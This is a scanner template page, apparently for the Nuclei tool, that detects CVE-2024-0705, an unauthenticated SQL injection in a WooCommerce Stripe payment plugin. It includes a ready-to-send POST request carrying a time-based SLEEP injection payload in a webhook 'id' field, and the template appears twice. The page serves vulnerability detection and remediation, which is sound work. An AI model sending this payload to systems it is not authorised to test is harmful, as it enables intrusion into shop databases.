Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection

CVE-2024-0705

Verified

Description

Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.

Severity

Critical

Published Date

February 6, 2026

Template Author

shivam kamboj

CVE-2024-0705.yaml

id: CVE-2024-0705

info:
  name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.
  remediation: |
    Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0705
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
  tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "payment-gateway-stripe")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /?wc-api=wt_stripe HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950

9.5Severity

CVSS Metrics

References

https://nvd.nist.gov/vuln/detail/CVE-2024-0705 https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve

Remediation Steps

Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.

id: CVE-2024-0705

info:
  name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.
  remediation: |
    Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
  impact: |
    Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0705
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
  tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "payment-gateway-stripe")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /?wc-api=wt_stripe HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950

Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection

Description

Severity

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps